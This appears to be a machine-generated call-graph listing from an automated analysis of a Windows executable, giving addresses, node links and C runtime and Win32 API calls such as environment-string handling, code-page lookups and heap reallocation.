Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16071->16076 16077 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16072->16077 16074->16061 16075->16080 16076->16063 16078 7ff7691c00f4 16077->16078 16085 7ff7691c26ec 40 API calls 16078->16085 16088 7ff7691c00fa 16078->16088 16079->16063 16080->16067 16081->16080 16082 7ff7691c26ec 40 API calls 16081->16082 16083 7ff7691c017c 16082->16083 16084 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16083->16084 16086 7ff7691c0186 16084->16086 16089 7ff7691c0126 16085->16089 16086->16080 16086->16088 16087 7ff7691c023f 16091 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16087->16091 16088->16087 16092 7ff7691bdea8 _set_fmode 11 API calls 16088->16092 16090 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16089->16090 16090->16088 16091->16073 16093 7ff7691c01cb 16092->16093 16094 7ff7691c01d3 16093->16094 16095 7ff7691c01dc 16093->16095 16096 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16094->16096 16120 7ff7691bf784 16095->16120 16099 7ff7691c01da 16096->16099 16105 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16099->16105 16100 7ff7691c01f2 SetEnvironmentVariableW 16102 7ff7691c0216 16100->16102 16103 7ff7691c0237 16100->16103 16101 7ff7691c027f 16104 7ff7691b9c10 _isindst 17 API calls 16101->16104 16106 7ff7691b43f4 _set_fmode 11 API calls 16102->16106 16108 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16103->16108 16107 7ff7691c0293 16104->16107 16105->16073 16109 7ff7691c021b 16106->16109 16108->16087 16110 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16109->16110 16110->16099 16112 7ff7691b97c1 16111->16112 16113 7ff7691b97cb 16111->16113 16112->16113 16118 7ff7691b97e6 16112->16118 16114 7ff7691b43f4 _set_fmode 11 API calls 16113->16114 16115 7ff7691b97d2 16114->16115 16116 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 16115->16116 16117 7ff7691b97de 16116->16117 16117->16034 16117->16035 16118->16117 16119 7ff7691b43f4 _set_fmode 11 API calls 16118->16119 16119->16115 16121 7ff7691bf791 16120->16121 16122 7ff7691bf79b 16120->16122 16121->16122 16126 7ff7691bf7b7 16121->16126 16123 7ff7691b43f4 _set_fmode 11 API calls 16122->16123 16128 7ff7691bf7a3 16123->16128 16124 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 16125 7ff7691bf7af 16124->16125 16125->16100 16125->16101 16126->16125 16127 7ff7691b43f4 _set_fmode 11 API calls 16126->16127 16127->16128 16128->16124 16130 7ff7691c02b1 16129->16130 16131 7ff7691c02c9 16129->16131 16130->15988 16132 7ff7691bdea8 _set_fmode 11 API calls 16131->16132 16138 7ff7691c02ed 16132->16138 16133 7ff7691c034e 16136 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16133->16136 16134 7ff7691b9814 __CxxCallCatchBlock 45 API calls 16135 7ff7691c0378 16134->16135 16136->16130 16137 7ff7691bdea8 _set_fmode 11 API calls 16137->16138 16138->16133 16138->16137 16139 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16138->16139 16140 7ff7691b97b4 __std_exception_copy 37 API calls 16138->16140 16141 7ff7691c035d 16138->16141 16143 7ff7691c0372 16138->16143 16139->16138 16140->16138 16142 7ff7691b9c10 _isindst 17 API calls 16141->16142 16142->16143 16143->16134 16145 7ff7691b89e8 16144->16145 16146 7ff7691b89f1 16144->16146 16145->16146 16259 7ff7691b84b0 16145->16259 16146->16002 16146->16003 16151 7ff7691c5564 16150->16151 16152 7ff7691c6449 16150->16152 16153 7ff7691c5571 16151->16153 16158 7ff7691c55a7 16151->16158 16154 7ff7691b4178 45 API calls 16152->16154 16156 7ff7691b43f4 _set_fmode 11 API calls 16153->16156 16161 7ff7691c5518 16153->16161 16155 7ff7691c647d 16154->16155 16163 7ff7691c6493 16155->16163 16167 7ff7691c64aa 16155->16167 16181 7ff7691c6482 16155->16181 16159 7ff7691c557b 16156->16159 16157 7ff7691c55d1 16160 7ff7691b43f4 _set_fmode 11 API calls 16157->16160 16158->16157 16162 7ff7691c55f6 16158->16162 16164 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 16159->16164 16165 7ff7691c55d6 16160->16165 16161->15997 16170 7ff7691b4178 45 API calls 16162->16170 16184 7ff7691c55e1 16162->16184 16168 7ff7691b43f4 _set_fmode 11 API calls 16163->16168 16169 7ff7691c5586 16164->16169 16166 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 16165->16166 16166->16184 16172 7ff7691c64c6 16167->16172 16173 7ff7691c64b4 16167->16173 16171 7ff7691c6498 16168->16171 16169->15997 16170->16184 16177 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 16171->16177 16175 7ff7691c64d7 16172->16175 16176 7ff7691c64ee 16172->16176 16174 7ff7691b43f4 _set_fmode 11 API calls 16173->16174 16178 7ff7691c64b9 16174->16178 16544 7ff7691c55b4 16175->16544 16553 7ff7691c825c 16176->16553 16177->16181 16182 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 16178->16182 16181->15997 16182->16181 16184->15997 16185 7ff7691b43f4 _set_fmode 11 API calls 16185->16181 16187 7ff7691c270e 16186->16187 16189 7ff7691c272b 16186->16189 16188 7ff7691c271c 16187->16188 16187->16189 16191 7ff7691b43f4 _set_fmode 11 API calls 16188->16191 16190 7ff7691c2735 16189->16190 16593 7ff7691c6f48 16189->16593 16600 7ff7691c6f84 16190->16600 16194 7ff7691c2721 __scrt_get_show_window_mode 16191->16194 16194->16022 16196 7ff7691b4178 45 API calls 16195->16196 16197 7ff7691c65ba 16196->16197 16198 7ff7691c65c8 16197->16198 16612 7ff7691be234 16197->16612 16615 7ff7691b47bc 16198->16615 16201 7ff7691c66b4 16205 7ff7691c66c5 16201->16205 16206 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16201->16206 16203 7ff7691b4178 45 API calls 16204 7ff7691c6637 16203->16204 16208 7ff7691be234 5 API calls 16204->16208 16211 7ff7691c6640 16204->16211 16207 7ff7691bfeb3 16205->16207 16209 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16205->16209 16206->16205 16207->16041 16207->16042 16208->16211 16209->16207 16210 7ff7691b47bc 14 API calls 16212 7ff7691c669b 16210->16212 16211->16210 16212->16201 16213 7ff7691c66a3 SetEnvironmentVariableW 16212->16213 16213->16201 16215 7ff7691c039f 16214->16215 16216 7ff7691c03bc 16214->16216 16215->16053 16217 7ff7691bdea8 _set_fmode 11 API calls 16216->16217 16224 7ff7691c03e0 16217->16224 16218 7ff7691c0464 16220 7ff7691b9814 __CxxCallCatchBlock 45 API calls 16218->16220 16219 7ff7691c0441 16221 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16219->16221 16222 7ff7691c046a 16220->16222 16221->16215 16223 7ff7691bdea8 _set_fmode 11 API calls 16223->16224 16224->16218 16224->16219 16224->16223 16225 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16224->16225 16226 7ff7691bf784 37 API calls 16224->16226 16227 7ff7691c0450 16224->16227 16225->16224 16226->16224 16228 7ff7691b9c10 _isindst 17 API calls 16227->16228 16228->16218 16230 7ff7691b8a24 16229->16230 16231 7ff7691b8a2d 16229->16231 16230->16231 16642 7ff7691b8524 16230->16642 16231->16069 16231->16070 16236 7ff7691c6309 16235->16236 16240 7ff7691c6336 16235->16240 16237 7ff7691c630e 16236->16237 16236->16240 16238 7ff7691b43f4 _set_fmode 11 API calls 16237->16238 16239 7ff7691c6313 16238->16239 16242 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 16239->16242 16241 7ff7691c637a 16240->16241 16243 7ff7691c6399 16240->16243 16257 7ff7691c636e __crtLCMapStringW 16240->16257 16244 7ff7691b43f4 _set_fmode 11 API calls 16241->16244 16245 7ff7691c631e 16242->16245 16246 7ff7691c63b5 16243->16246 16247 7ff7691c63a3 16243->16247 16248 7ff7691c637f 16244->16248 16245->16063 16250 7ff7691b4178 45 API calls 16246->16250 16249 7ff7691b43f4 _set_fmode 11 API calls 16247->16249 16251 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 16248->16251 16252 7ff7691c63a8 16249->16252 16253 7ff7691c63c2 16250->16253 16251->16257 16254 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 16252->16254 16253->16257 16689 7ff7691c7e18 16253->16689 16254->16257 16257->16063 16258 7ff7691b43f4 _set_fmode 11 API calls 16258->16257 16260 7ff7691b84c9 16259->16260 16269 7ff7691b84c5 16259->16269 16282 7ff7691c1900 16260->16282 16265 7ff7691b84e7 16308 7ff7691b8594 16265->16308 16266 7ff7691b84db 16267 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16266->16267 16267->16269 16269->16146 16274 7ff7691b8804 16269->16274 16271 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16272 7ff7691b850e 16271->16272 16273 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16272->16273 16273->16269 16275 7ff7691b882d 16274->16275 16280 7ff7691b8846 16274->16280 16275->16146 16276 7ff7691bdea8 _set_fmode 11 API calls 16276->16280 16277 7ff7691b88d6 16279 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16277->16279 16278 7ff7691bfaf8 WideCharToMultiByte 16278->16280 16279->16275 16280->16275 16280->16276 16280->16277 16280->16278 16281 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16280->16281 16281->16280 16283 7ff7691c190d 16282->16283 16287 7ff7691b84ce 16282->16287 16327 7ff7691ba534 16283->16327 16288 7ff7691c1c3c GetEnvironmentStringsW 16287->16288 16289 7ff7691b84d3 16288->16289 16290 7ff7691c1c6c 16288->16290 16289->16265 16289->16266 16290->16290 16291 7ff7691bfaf8 WideCharToMultiByte 16290->16291 16292 7ff7691c1cbd 16291->16292 16293 7ff7691c1cc4 FreeEnvironmentStringsW 16292->16293 16294 7ff7691bc90c _fread_nolock 12 API calls 16292->16294 16293->16289 16295 7ff7691c1cd7 16294->16295 16296 7ff7691c1cdf 16295->16296 16297 7ff7691c1ce8 16295->16297 16298 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16296->16298 16299 7ff7691bfaf8 WideCharToMultiByte 16297->16299 16300 7ff7691c1ce6 16298->16300 16301 7ff7691c1d0b 16299->16301 16300->16293 16302 7ff7691c1d0f 16301->16302 16303 7ff7691c1d19 16301->16303 16304 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16302->16304 16305 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16303->16305 16306 7ff7691c1d17 FreeEnvironmentStringsW 16304->16306 16305->16306 16306->16289 16309 7ff7691b85b9 16308->16309 16310 7ff7691bdea8 _set_fmode 11 API calls 16309->16310 16323 7ff7691b85ef 16310->16323 16311 7ff7691b85f7 16312 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16311->16312 16314 7ff7691b84ef 16312->16314 16313 7ff7691b866a 16315 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16313->16315 16314->16271 16315->16314 16316 7ff7691bdea8 _set_fmode 11 API calls 16316->16323 16317 7ff7691b8659 16538 7ff7691b87c0 16317->16538 16318 7ff7691b97b4 __std_exception_copy 37 API calls 16318->16323 16321 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16321->16311 16322 7ff7691b868f 16324 7ff7691b9c10 _isindst 17 API calls 16322->16324 16323->16311 16323->16313 16323->16316 16323->16317 16323->16318 16323->16322 16325 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16323->16325 16326 7ff7691b86a2 16324->16326 16325->16323 16328 7ff7691ba560 FlsSetValue 16327->16328 16329 7ff7691ba545 FlsGetValue 16327->16329 16330 7ff7691ba56d 16328->16330 16331 7ff7691ba552 16328->16331 16329->16331 16332 7ff7691ba55a 16329->16332 16333 7ff7691bdea8 _set_fmode 11 API calls 16330->16333 16334 7ff7691ba558 16331->16334 16335 7ff7691b9814 __CxxCallCatchBlock 45 API calls 16331->16335 16332->16328 16337 7ff7691ba57c 16333->16337 16347 7ff7691c15d4 16334->16347 16336 7ff7691ba5d5 16335->16336 16338 7ff7691ba59a FlsSetValue 16337->16338 16339 7ff7691ba58a FlsSetValue 16337->16339 16341 7ff7691ba5a6 FlsSetValue 16338->16341 16342 7ff7691ba5b8 16338->16342 16340 7ff7691ba593 16339->16340 16343 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16340->16343 16341->16340 16344 7ff7691ba204 _set_fmode 11 API calls 16342->16344 16343->16331 16345 7ff7691ba5c0 16344->16345 16346 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16345->16346 16346->16334 16370 7ff7691c1844 16347->16370 16349 7ff7691c1609 16385 7ff7691c12d4 16349->16385 16352 7ff7691bc90c _fread_nolock 12 API calls 16353 7ff7691c1637 16352->16353 16354 7ff7691c163f 16353->16354 16356 7ff7691c164e 16353->16356 16355 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16354->16355 16369 7ff7691c1626 16355->16369 16356->16356 16392 7ff7691c197c 16356->16392 16359 7ff7691c174a 16360 7ff7691b43f4 _set_fmode 11 API calls 16359->16360 16362 7ff7691c174f 16360->16362 16361 7ff7691c17a5 16364 7ff7691c180c 16361->16364 16403 7ff7691c1104 16361->16403 16365 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16362->16365 16363 7ff7691c1764 16363->16361 16366 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16363->16366 16368 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16364->16368 16365->16369 16366->16361 16368->16369 16369->16287 16371 7ff7691c1867 16370->16371 16372 7ff7691c1871 16371->16372 16418 7ff7691bf5e8 EnterCriticalSection 16371->16418 16375 7ff7691c18e3 16372->16375 16377 7ff7691b9814 __CxxCallCatchBlock 45 API calls 16372->16377 16375->16349 16379 7ff7691c18fb 16377->16379 16380 7ff7691c1952 16379->16380 16382 7ff7691ba534 50 API calls 16379->16382 16380->16349 16383 7ff7691c193c 16382->16383 16384 7ff7691c15d4 65 API calls 16383->16384 16384->16380 16419 7ff7691b4178 16385->16419 16388 7ff7691c1306 16390 7ff7691c130b GetACP 16388->16390 16391 7ff7691c131b 16388->16391 16389 7ff7691c12f4 GetOEMCP 16389->16391 16390->16391 16391->16352 16391->16369 16393 7ff7691c12d4 47 API calls 16392->16393 16394 7ff7691c19a9 16393->16394 16395 7ff7691c1aff 16394->16395 16397 7ff7691c19e6 IsValidCodePage 16394->16397 16402 7ff7691c1a00 __scrt_get_show_window_mode 16394->16402 16396 7ff7691ab870 _log10_special 8 API calls 16395->16396 16398 7ff7691c1741 16396->16398 16397->16395 16399 7ff7691c19f7 16397->16399 16398->16359 16398->16363 16400 7ff7691c1a26 GetCPInfo 16399->16400 16399->16402 16400->16395 16400->16402 16451 7ff7691c13ec 16402->16451 16537 7ff7691bf5e8 EnterCriticalSection 16403->16537 16420 7ff7691b4197 16419->16420 16421 7ff7691b419c 16419->16421 16420->16388 16420->16389 16421->16420 16422 7ff7691ba460 __CxxCallCatchBlock 45 API calls 16421->16422 16423 7ff7691b41b7 16422->16423 16427 7ff7691bcc94 16423->16427 16428 7ff7691b41da 16427->16428 16429 7ff7691bcca9 16427->16429 16431 7ff7691bcd00 16428->16431 16429->16428 16435 7ff7691c2614 16429->16435 16432 7ff7691bcd15 16431->16432 16433 7ff7691bcd28 16431->16433 16432->16433 16448 7ff7691c1960 16432->16448 16433->16420 16436 7ff7691ba460 __CxxCallCatchBlock 45 API calls 16435->16436 16437 7ff7691c2623 16436->16437 16438 7ff7691c266e 16437->16438 16447 7ff7691bf5e8 EnterCriticalSection 16437->16447 16438->16428 16449 7ff7691ba460 __CxxCallCatchBlock 45 API calls 16448->16449 16450 7ff7691c1969 16449->16450 16452 7ff7691c1429 GetCPInfo 16451->16452 16453 7ff7691c151f 16451->16453 16452->16453 16454 7ff7691c143c 16452->16454 16455 7ff7691ab870 _log10_special 8 API calls 16453->16455 16462 7ff7691c2150 16454->16462 16457 7ff7691c15be 16455->16457 16457->16395 16463 7ff7691b4178 45 API calls 16462->16463 16464 7ff7691c2192 16463->16464 16482 7ff7691bebb0 16464->16482 16484 7ff7691bebb9 MultiByteToWideChar 16482->16484 16539 7ff7691b8661 16538->16539 16540 7ff7691b87c5 16538->16540 16539->16321 16541 7ff7691b87ee 16540->16541 16542 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16540->16542 16543 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16541->16543 16542->16540 16543->16539 16545 7ff7691c55d1 16544->16545 16546 7ff7691c55e8 16544->16546 16547 7ff7691b43f4 _set_fmode 11 API calls 16545->16547 16546->16545 16548 7ff7691c55f6 16546->16548 16549 7ff7691c55d6 16547->16549 16551 7ff7691b4178 45 API calls 16548->16551 16552 7ff7691c55e1 16548->16552 16550 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 16549->16550 16550->16552 16551->16552 16552->16181 16554 7ff7691b4178 45 API calls 16553->16554 16555 7ff7691c8281 16554->16555 16558 7ff7691c7ed8 16555->16558 16560 7ff7691c7f26 16558->16560 16559 7ff7691ab870 _log10_special 8 API calls 16561 7ff7691c6515 16559->16561 16562 7ff7691c7fad 16560->16562 16564 7ff7691c7f98 GetCPInfo 16560->16564 16567 7ff7691c7fb1 16560->16567 16561->16181 16561->16185 16563 7ff7691bebb0 _fread_nolock MultiByteToWideChar 16562->16563 16562->16567 16565 7ff7691c8045 16563->16565 16564->16562 16564->16567 16566 7ff7691bc90c _fread_nolock 12 API calls 16565->16566 16565->16567 16568 7ff7691c807c 16565->16568 16566->16568 16567->16559 16568->16567 16569 7ff7691bebb0 _fread_nolock MultiByteToWideChar 16568->16569 16570 7ff7691c80ea 16569->16570 16571 7ff7691c81cc 16570->16571 16572 7ff7691bebb0 _fread_nolock MultiByteToWideChar 16570->16572 16571->16567 16573 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16571->16573 16574 7ff7691c8110 16572->16574 16573->16567 16574->16571 16575 7ff7691bc90c _fread_nolock 12 API calls 16574->16575 16576 7ff7691c813d 16574->16576 16575->16576 16576->16571 16577 7ff7691bebb0 _fread_nolock MultiByteToWideChar 16576->16577 16578 7ff7691c81b4 16577->16578 16579 7ff7691c81d4 16578->16579 16580 7ff7691c81ba 16578->16580 16587 7ff7691be278 16579->16587 16580->16571 16582 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16580->16582 16582->16571 16584 7ff7691c8213 16584->16567 16586 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16584->16586 16585 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16585->16584 16586->16567 16588 7ff7691be020 __crtLCMapStringW 5 API calls 16587->16588 16589 7ff7691be2b6 16588->16589 16590 7ff7691be4e0 __crtLCMapStringW 5 API calls 16589->16590 16592 7ff7691be2be 16589->16592 16591 7ff7691be327 CompareStringW 16590->16591 16591->16592 16592->16584 16592->16585 16594 7ff7691c6f51 16593->16594 16595 7ff7691c6f6a HeapSize 16593->16595 16596 7ff7691b43f4 _set_fmode 11 API calls 16594->16596 16597 7ff7691c6f56 16596->16597 16598 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 16597->16598 16599 7ff7691c6f61 16598->16599 16599->16190 16601 7ff7691c6fa3 16600->16601 16602 7ff7691c6f99 16600->16602 16603 7ff7691c6fa8 16601->16603 16610 7ff7691c6faf _set_fmode 16601->16610 16604 7ff7691bc90c _fread_nolock 12 API calls 16602->16604 16605 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16603->16605 16608 7ff7691c6fa1 16604->16608 16605->16608 16606 7ff7691c6fe2 HeapReAlloc 16606->16608 16606->16610 16607 7ff7691c6fb5 16609 7ff7691b43f4 _set_fmode 11 API calls 16607->16609 16608->16194 16609->16608 16610->16606 16610->16607 16611 7ff7691c28a0 _set_fmode 2 API calls 16610->16611 16611->16610 16613 7ff7691be020 __crtLCMapStringW 5 API calls 16612->16613 16614 7ff7691be254 16613->16614 16614->16198 16616 7ff7691b480a 16615->16616 16617 7ff7691b47e6 16615->16617 16618 7ff7691b480f 16616->16618 16619 7ff7691b4864 16616->16619 16621 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16617->16621 16625 7ff7691b47f5 16617->16625 16622 7ff7691b4824 16618->16622 16618->16625 16626 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16618->16626 16620 7ff7691bebb0 _fread_nolock MultiByteToWideChar 16619->16620 16632 7ff7691b4880 16620->16632 16621->16625 16623 7ff7691bc90c _fread_nolock 12 API calls 16622->16623 16623->16625 16624 7ff7691b4887 GetLastError 16637 7ff7691b4368 16624->16637 16625->16201 16625->16203 16626->16622 16628 7ff7691b48c2 16628->16625 16629 7ff7691bebb0 _fread_nolock MultiByteToWideChar 16628->16629 16634 7ff7691b4906 16629->16634 16631 7ff7691b48b5 16633 7ff7691bc90c _fread_nolock 12 API calls 16631->16633 16632->16624 16632->16628 16632->16631 16636 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16632->16636 16633->16628 16634->16624 16634->16625 16635 7ff7691b43f4 _set_fmode 11 API calls 16635->16625 16636->16631 16638 7ff7691ba5d8 _set_fmode 11 API calls 16637->16638 16639 7ff7691b4375 Concurrency::details::SchedulerProxy::DeleteThis 16638->16639 16640 7ff7691ba5d8 _set_fmode 11 API calls 16639->16640 16641 7ff7691b4397 16640->16641 16641->16635 16643 7ff7691b8539 16642->16643 16644 7ff7691b853d 16642->16644 16643->16231 16655 7ff7691b88e4 16643->16655 16663 7ff7691c1d4c GetEnvironmentStringsW 16644->16663 16647 7ff7691b8556 16670 7ff7691b86a4 16647->16670 16648 7ff7691b854a 16650 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16648->16650 16650->16643 16652 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16653 7ff7691b857d 16652->16653 16654 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16653->16654 16654->16643 16656 7ff7691b8907 16655->16656 16660 7ff7691b891e 16655->16660 16656->16231 16657 7ff7691bebb0 MultiByteToWideChar _fread_nolock 16657->16660 16658 7ff7691bdea8 _set_fmode 11 API calls 16658->16660 16659 7ff7691b8992 16661 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16659->16661 16660->16656 16660->16657 16660->16658 16660->16659 16662 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16660->16662 16661->16656 16662->16660 16664 7ff7691c1d70 16663->16664 16665 7ff7691b8542 16663->16665 16666 7ff7691bc90c _fread_nolock 12 API calls 16664->16666 16665->16647 16665->16648 16667 7ff7691c1da7 memcpy_s 16666->16667 16668 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16667->16668 16669 7ff7691c1dc7 FreeEnvironmentStringsW 16668->16669 16669->16665 16671 7ff7691b86cc 16670->16671 16672 7ff7691bdea8 _set_fmode 11 API calls 16671->16672 16683 7ff7691b8707 16672->16683 16673 7ff7691b870f 16674 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16673->16674 16676 7ff7691b855e 16674->16676 16675 7ff7691b8789 16677 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16675->16677 16676->16652 16677->16676 16678 7ff7691bdea8 _set_fmode 11 API calls 16678->16683 16679 7ff7691b8778 16681 7ff7691b87c0 11 API calls 16679->16681 16680 7ff7691bf784 37 API calls 16680->16683 16682 7ff7691b8780 16681->16682 16685 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16682->16685 16683->16673 16683->16675 16683->16678 16683->16679 16683->16680 16684 7ff7691b87ac 16683->16684 16687 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16683->16687 16686 7ff7691b9c10 _isindst 17 API calls 16684->16686 16685->16673 16688 7ff7691b87be 16686->16688 16687->16683 16691 7ff7691c7e41 __crtLCMapStringW 16689->16691 16690 7ff7691c63fe 16690->16257 16690->16258 16691->16690 16692 7ff7691be278 6 API calls 16691->16692 16692->16690 16903 7ff7691abf5c 16924 7ff7691ac12c 16903->16924 16906 7ff7691ac0a8 17047 7ff7691ac44c IsProcessorFeaturePresent 16906->17047 16907 7ff7691abf78 __scrt_acquire_startup_lock 16909 7ff7691ac0b2 16907->16909 16914 7ff7691abf96 __scrt_release_startup_lock 16907->16914 16910 7ff7691ac44c 7 API calls 16909->16910 16912 7ff7691ac0bd __CxxCallCatchBlock 16910->16912 16911 7ff7691abfbb 16913 7ff7691ac041 16930 7ff7691ac594 16913->16930 16914->16911 16914->16913 17036 7ff7691b8e44 16914->17036 16916 7ff7691ac046 16933 7ff7691a1000 16916->16933 16921 7ff7691ac069 16921->16912 17043 7ff7691ac2b0 16921->17043 16925 7ff7691ac134 16924->16925 16926 7ff7691ac140 __scrt_dllmain_crt_thread_attach 16925->16926 16927 7ff7691abf70 16926->16927 16928 7ff7691ac14d 16926->16928 16927->16906 16927->16907 16928->16927 17054 7ff7691acba8 16928->17054 16931 7ff7691c97e0 __scrt_get_show_window_mode 16930->16931 16932 7ff7691ac5ab GetStartupInfoW 16931->16932 16932->16916 16934 7ff7691a1009 16933->16934 17081 7ff7691b4794 16934->17081 16936 7ff7691a352b 17088 7ff7691a33e0 16936->17088 16940 7ff7691ab870 _log10_special 8 API calls 16942 7ff7691a372a 16940->16942 17041 7ff7691ac5d8 GetModuleHandleW 16942->17041 16943 7ff7691a3736 17279 7ff7691a3f70 16943->17279 16944 7ff7691a356c 16946 7ff7691a1bf0 49 API calls 16944->16946 16960 7ff7691a3588 16946->16960 16948 7ff7691a3785 16949 7ff7691a25f0 53 API calls 16948->16949 17027 7ff7691a3538 16949->17027 16952 7ff7691a365f __std_exception_copy 16957 7ff7691a3834 16952->16957 16961 7ff7691a7e10 14 API calls 16952->16961 16953 7ff7691a3778 16954 7ff7691a379f 16953->16954 16955 7ff7691a377d 16953->16955 16956 7ff7691a1bf0 49 API calls 16954->16956 17298 7ff7691af36c 16955->17298 16959 7ff7691a37be 16956->16959 16984 7ff7691a3805 __std_exception_copy 16957->16984 17302 7ff7691a3e90 16957->17302 16969 7ff7691a18f0 115 API calls 16959->16969 17150 7ff7691a7e10 16960->17150 16963 7ff7691a36ae 16961->16963 17163 7ff7691a7f80 16963->17163 16964 7ff7691a3852 16966 7ff7691a3871 16964->16966 16967 7ff7691a3865 16964->16967 16968 7ff7691a1bf0 49 API calls 16966->16968 17305 7ff7691a3fe0 16967->17305 16968->16984 16972 7ff7691a37df 16969->16972 16970 7ff7691a36bd 16973 7ff7691a380f 16970->16973 16977 7ff7691a36cf 16970->16977 16972->16960 16976 7ff7691a37ef 16972->16976 17172 7ff7691a8400 16973->17172 16980 7ff7691a25f0 53 API calls 16976->16980 17168 7ff7691a1bf0 16977->17168 16979 7ff7691a389e SetDllDirectoryW 16987 7ff7691a38c3 16979->16987 16980->17027 17223 7ff7691a86b0 16984->17223 16985 7ff7691a36fc 17268 7ff7691a25f0 16985->17268 16989 7ff7691a3a50 16987->16989 17228 7ff7691a6560 16987->17228 16991 7ff7691a3a5a PostMessageW GetMessageW 16989->16991 16992 7ff7691a3a7d 16989->16992 16991->16992 17363 7ff7691a3080 16992->17363 16995 7ff7691a38ea 16997 7ff7691a3947 16995->16997 17002 7ff7691a3901 16995->17002 17308 7ff7691a65a0 16995->17308 16997->16989 17003 7ff7691a395c 16997->17003 17011 7ff7691a3905 17002->17011 17329 7ff7691a6970 17002->17329 17248 7ff7691a30e0 17003->17248 17007 7ff7691a6780 FreeLibrary 17010 7ff7691a3aa3 17007->17010 17011->16997 17345 7ff7691a2870 17011->17345 17027->16940 17037 7ff7691b8e7c 17036->17037 17038 7ff7691b8e5b 17036->17038 17039 7ff7691b96e8 45 API calls 17037->17039 17038->16913 17040 7ff7691b8e81 17039->17040 17042 7ff7691ac5e9 17041->17042 17042->16921 17045 7ff7691ac2c1 17043->17045 17044 7ff7691ac080 17044->16911 17045->17044 17046 7ff7691acba8 7 API calls 17045->17046 17046->17044 17048 7ff7691ac472 __CxxCallCatchBlock __scrt_get_show_window_mode 17047->17048 17049 7ff7691ac491 RtlCaptureContext RtlLookupFunctionEntry 17048->17049 17050 7ff7691ac4f6 __scrt_get_show_window_mode 17049->17050 17051 7ff7691ac4ba RtlVirtualUnwind 17049->17051 17052 7ff7691ac528 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17050->17052 17051->17050 17053 7ff7691ac576 __CxxCallCatchBlock 17052->17053 17053->16909 17055 7ff7691acbb0 17054->17055 17056 7ff7691acbba 17054->17056 17060 7ff7691acf44 17055->17060 